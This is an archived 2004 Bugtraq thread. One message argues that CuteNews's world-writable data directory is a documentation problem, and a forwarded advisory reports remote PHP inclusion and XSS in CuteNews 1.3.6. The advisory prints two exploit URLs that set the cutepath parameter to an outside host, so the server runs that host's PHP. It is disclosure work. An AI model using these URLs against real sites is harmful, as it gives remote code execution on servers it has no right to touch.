Bugtraq mailing list archives
RE: CuteNews News.txt writable to world
From: Albert Puigsech Galicia <ripe () 7a69ezine org>
Date: Tue, 31 Aug 2004 00:49:15 +0200
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Sunday 29 August 2004 10:39, e0r wrote:
Date: August 29, 2004 Vender: http://www.cutephp.com/ Program: CuteNews Versions affected: => 1.3.6 Bug: CuteNews News.txt writable to world Type: Author: e0r www: http://www.rootthief.com/ team: !Sui-Generes (!Sui) Email: homicidal @ gmail . com -----------------------------
This is not realy a code vulnerability, the problem is in the documentation where you can read: "Now You must CHMOD the the directory cutenews/data/ and all files and folders under the data/ directory must be also chmod'ed to 777" You can do that without 777 permisions using some alternative methods; setting directory group as apache user, or using apache suexec. However CuteNews have some AUTHENTIC vulnerabilities. - -- - ----------------------------------------------------------------------- Albert Puigsech Galicia http://www.7a69ezine.org/~apuigsech - ----------------------------------------------------------------------- Este e-mail puede contener información confidencial y/o privilegiada. Si el presente mensaje no va dirigido a su persona (o lo ha recibido por error) por favor, notifíquelo inmediatamente al emisor y destruya este e-mail. Cualquier divulgación, copia o distribución no autorizada del material contenido en este e-mail queda prohibida. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (GNU/Linux) iD8DBQFBM670iLW5f5WBvGcRAqfiAJ9z/EuWShz9Zby5/HDznKN+jZk4zQCfRKqn QDNQZX3iHoXV1U6DVx+NAkQ= =yogr -----END PGP SIGNATURE-----
--- Begin Message --- From: Albert Puigsech Galicia <ripe () 7a69ezine org>
Date: Tue, 31 Aug 2004 00:47:02 +0200
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------ 7a69ezine Advisories 7a69Adv#14 - ------------------------------------------------------------------ http://www.7a69ezine.org - ------------------------------------------------------------------ Title: CuteNews multiple vulnerabilities Author: Albert Puigsech Galicia - <ripe () 7a69ezine org> Software: CuteNews Versions: => 1.3.6 Remote: yes Exploit: yes Severity: High - ------------------------------------------------------------------ I. Introduction CuteNews is a simple news management system that suports coments, archives, avatars, backups, and other issues. It's easy to install beause doesn't need any database backend. You can get more informatión and download it from; http://cutephp.com/cutenews/ II. Description There are multiple well know php include vulnerabilities that can allow remote users to execute php code with http server privileges. There are also some XSS vulnerabilities. III. Exploit You can modify some php require() calls to execute remote php files located, for example, on your own http server. - This will rexecute 'http://remote/data/config.php': http://vulnerable/show_archives.php?cutepath=http://remote/ http://vulnerable/show_news.php?cutepath=http://remote/ IV. Patch Not Yet. V. Timeline No timeline VI. Extra data For spanish information you can visit Advisories section on 7a69ezine website: http://www.7a69ezine.org/avisos/propios - -- - ----------------------------------------------------------------------- Albert Puigsech Galicia http://www.7a69ezine.org/~apuigsech - ----------------------------------------------------------------------- Este e-mail puede contener información confidencial y/o privilegiada. Si el presente mensaje no va dirigido a su persona (o lo ha recibido por error) por favor, notifíquelo inmediatamente al emisor y destruya este e-mail. Cualquier divulgación, copia o distribución no autorizada del material contenido en este e-mail queda prohibida. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (GNU/Linux) iD8DBQFBM65riLW5f5WBvGcRAoUEAJ9QI4ADFqKMLEMDCxbzAR9c94O3QgCfSc4D kauk5bXjk+cYidR1aupRqYI= =XNEe -----END PGP SIGNATURE-----
--- End Message ---
Current thread:
- RE: CuteNews News.txt writable to world Albert Puigsech Galicia (Sep 01)